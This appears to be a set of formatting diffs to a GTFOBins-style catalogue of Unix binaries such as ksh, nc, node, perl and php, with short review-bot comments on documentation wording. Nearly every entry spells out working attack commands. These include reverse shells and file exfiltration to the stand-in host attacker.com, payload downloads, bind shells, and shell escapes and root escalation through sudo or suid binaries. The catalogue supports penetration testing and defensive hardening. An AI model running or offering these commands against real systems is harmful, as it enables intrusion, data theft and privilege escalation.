ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP
|
||||
service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
|
||||
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_send
|
||||
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"`
|
||||
on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
|
||||
3<>/dev/tcp/$RHOST/$RPORT \
|
||||
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
|
||||
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
export LFILE=file_to_get
|
||||
ksh -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ksh -c 'echo data > $LFILE'
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ksh -c 'echo data > $LFILE'
|
||||
file-read:
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c 'echo "$(<$LFILE)"'
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c 'echo "$(<$LFILE)"'
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
export LFILE=file_to_read
|
||||
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
||||
suid-enabled:
|
||||
- code: "./ksh -p"
|
||||
- code: ./ksh -p
|
||||
sudo-enabled:
|
||||
- code: sudo ksh
|
||||
- code: sudo ksh
|
||||
---
|
||||
|
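Review bot: The HTTP POST upload entry builds the body with `$(cat $LFILE)`, which trims trailing newlines and is not binary-safe just like the `$(<$LFILE)` file-read entry whose description says so, but the upload description omits the caveat. I would append to it: `Like the file-read example this goes through command substitution, so trailing newlines are trimmed and it is not binary-safe; use the TCP variant for binary data.` The second file-read variant, `read -r -d \x04`, additionally stops at the first 0x04 byte, which its description "It trims trailing newlines" does not convey; I would note that it is not binary-safe either.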
@ -9,9 +9,9 @@ description: |
|
||||
```
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: "/lib/ld.so /bin/sh"
|
||||
- code: /lib/ld.so /bin/sh
|
||||
suid-enabled:
|
||||
- code: "./ld.so /bin/sh -p"
|
||||
- code: ./ld.so /bin/sh -p
|
||||
sudo-enabled:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
---
|
||||
|
@ -1,22 +1,20 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||||
v
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||||
v
|
||||
file-read:
|
||||
- code: 'less file_to_read
|
||||
|
||||
'
|
||||
- code: less file_to_read
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
./less /etc/profile
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,7 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: ltrace -b -L /bin/sh
|
||||
- code: ltrace -b -L /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo ltrace -b -L /bin/sh
|
||||
- code: sudo ltrace -b -L /bin/sh
|
||||
---
|
||||
|
@ -1,17 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
mail -f $TF
|
||||
!/bin/sh
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
mail -f $TF
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
sudo mail -f $TF
|
||||
!/bin/sh
|
||||
- description: This creates a valid Mbox file which may be required by the binary.
|
||||
code: |
|
||||
TF=$(mktemp)
|
||||
echo "From nobody@localhost $(date)" > $TF
|
||||
sudo mail -f $TF
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,24 +1,21 @@
|
||||
---
|
||||
description: |
|
||||
All these examples only work with GNU `make` due to the lack of support of the
|
||||
`--eval` flag. The same can be achieved by using a proper `Makefile` or by
|
||||
passing the content via stdin using `-f -`.
|
||||
description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
file-write:
|
||||
- description: Requires a newer GNU `make` version.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
make -s --eval="\$(file >$LFILE,data)" .
|
||||
- description: Requires a newer GNU `make` version.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
make -s --eval="\$(file >$LFILE,data)" .
|
||||
suid-enabled:
|
||||
- code: |
|
||||
COMMAND='/bin/sh -p'
|
||||
./make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
- code: |
|
||||
COMMAND='/bin/sh -p'
|
||||
./make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
- code: |
|
||||
COMMAND='/bin/sh'
|
||||
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||
---
|
||||
|
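Review bot: The file-write description "Requires a newer GNU `make` version." leaves the reader guessing which version is enough; the `$(file >$LFILE,data)` function it relies on was introduced in GNU make 4.0. I would make it `Requires GNU make 4.0 or later, which introduced the \`$(file ...)\` function.` The now single-line top description is fine given the line-length rule is disabled.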
@ -1,19 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: 'man file_to_read
|
||||
|
||||
'
|
||||
- code: man file_to_read
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
- code: |
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./man man
|
||||
!/bin/sh
|
||||
- code: |
|
||||
./man man
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,17 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: 'more file_to_read
|
||||
|
||||
'
|
||||
- code: more file_to_read
|
||||
suid-enabled:
|
||||
- code: "./more file_to_read\n"
|
||||
- code: "./more file_to_read\n"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
|
||||
code: |
|
||||
sudo mount -o bind /bin/sh /bin/mount
|
||||
sudo mount
|
||||
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
|
||||
code: |
|
||||
sudo mount -o bind /bin/sh /bin/mount
|
||||
sudo mount
|
||||
---
|
||||
|
@ -1,38 +1,36 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
nano -s $TF /etc/hosts
|
||||
^T
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
nano -s $TF /etc/hosts
|
||||
^T
|
||||
file-write:
|
||||
- code: |
|
||||
nano file_to_write
|
||||
^O
|
||||
- code: |
|
||||
nano file_to_write
|
||||
^O
|
||||
file-read:
|
||||
- code: 'nano file_to_read
|
||||
|
||||
'
|
||||
- code: nano file_to_read
|
||||
suid-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
./nano -s $TF /etc/hosts
|
||||
^T
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
./nano -s $TF /etc/hosts
|
||||
^T
|
||||
sudo-enabled:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
sudo nano -s $TF /etc/hosts
|
||||
^T
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
sudo nano -s $TF /etc/hosts
|
||||
^T
|
||||
---
|
||||
|
@ -1,29 +1,27 @@
|
||||
---
|
||||
functions:
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
bind-shell-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
nc -l -p $LPORT -e /bin/sh
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
LPORT=12345
|
||||
nc -l -p $LPORT -e /bin/sh
|
||||
upload:
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
download:
|
||||
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345
|
||||
< "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
LPORT=12345
|
||||
LFILE=file_to_save
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
|
||||
code: |
|
||||
LPORT=12345
|
||||
LFILE=file_to_save
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
---
|
||||
|
@ -1,19 +1,16 @@
|
||||
---
|
||||
description: 'The read file content is corrupted by a leading space added to each
|
||||
line.
|
||||
|
||||
'
|
||||
description: The read file content is corrupted by a leading space added to each line.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
nl -bn -w1 -s '' $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
nl -bn -w1 -s '' $LFILE
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./nl -bn -w1 -s '' $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./nl -bn -w1 -s '' $LFILE
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo nl -bn -w1 -s '' $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo nl -bn -w1 -s '' $LFILE
|
||||
---
|
||||
|
@ -1,38 +1,33 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});''
|
||||
|
||||
'
|
||||
- code: |
|
||||
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
net.connect(process.env.RPORT, process.env.RHOST, function () {
|
||||
this.pipe(sh.stdin);
|
||||
sh.stdout.pipe(this);
|
||||
sh.stderr.pipe(this);
|
||||
});'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
net.connect(process.env.RPORT, process.env.RHOST, function () {
|
||||
this.pipe(sh.stdin);
|
||||
sh.stdout.pipe(this);
|
||||
sh.stderr.pipe(this);
|
||||
});'
|
||||
bind-shell-interactive:
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
require("net").createServer(function (client) {
|
||||
client.pipe(sh.stdin);
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
}).listen(process.env.LPORT);'
|
||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||
code: |
|
||||
export LPORT=12345
|
||||
node -e 'sh = require("child_process").spawn("/bin/sh");
|
||||
require("net").createServer(function (client) {
|
||||
client.pipe(sh.stdin);
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
}).listen(process.env.LPORT);'
|
||||
suid-enabled:
|
||||
- code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0,
|
||||
1, 2]});''
|
||||
|
||||
'
|
||||
- code: |
|
||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||
sudo-enabled:
|
||||
- code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1,
|
||||
2]});''
|
||||
|
||||
'
|
||||
- code: |
|
||||
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||
---
|
||||
|
@ -1,18 +1,16 @@
|
||||
---
|
||||
description: |
|
||||
Three spaces are added before each character in the read file, and
|
||||
non-printable chars are printed as backslash escape sequences.
|
||||
description: Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
od -An -c -w9999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
od -An -c -w9999 "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./od -An -c -w9999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./od -An -c -w9999 "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo od -An -c -w9999 "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo od -An -c -w9999 "$LFILE"
|
||||
---
|
||||
|
@ -1,15 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
suid-enabled:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
---
|
||||
|
@ -1,50 +1,49 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'system(getenv("CMD"));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'passthru(getenv("CMD"));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'print(shell_exec(getenv("CMD")));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'system(getenv("CMD"));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'passthru(getenv("CMD"));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r 'print(shell_exec(getenv("CMD")));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'
|
||||
- code: |
|
||||
export CMD="/bin/sh"
|
||||
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
||||
execute-non-interactive:
|
||||
- code: |
|
||||
export CMD="id"
|
||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||
- code: |
|
||||
export CMD="id"
|
||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||
reverse-shell-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server. This requires
|
||||
PHP version 5.4 or later.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
php -S $LHOST:$LPORT
|
||||
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
php -S $LHOST:$LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||
suid-enabled:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
./php -r "system('$CMD');"
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
./php -r "system('$CMD');"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
sudo php -r "system('$CMD');"
|
||||
- code: |
|
||||
CMD="/bin/sh"
|
||||
sudo php -r "system('$CMD');"
|
||||
---
|
||||
|
@ -1,38 +1,36 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
pico -s $TF /etc/hosts
|
||||
^T
|
||||
- description: After running this exit the editor to see the command output.
|
||||
code: |
|
||||
COMMAND=id
|
||||
TF=$(mktemp)
|
||||
echo "$COMMAND" > $TF
|
||||
chmod +x $TF
|
||||
pico -s $TF /etc/hosts
|
||||
^T
|
||||
file-write:
|
||||
- code: |
|
||||
pico file_to_write
|
||||
^O
|
||||
- code: |
|
||||
pico file_to_write
|
||||
^O
|
||||
file-read:
|
||||
- code: 'pico file_to_read
|
||||